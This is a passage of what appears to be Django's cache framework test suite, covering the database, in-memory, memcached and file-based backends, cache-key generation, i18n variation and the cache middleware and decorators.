with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
        # The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertEqual(caches['other'].get('value'), None)
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache in settings.CACHES.items():
if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
shutil.rmtree(self.dirname)
super(FileBasedCacheTests, self).tearDown()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIs(None, cache.default_timeout)
self.assertEqual(None, cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertNotEqual(None, cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertEqual(None, cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertTrue(get_cache_key(request1) != get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertEqual(result, None)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is special because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
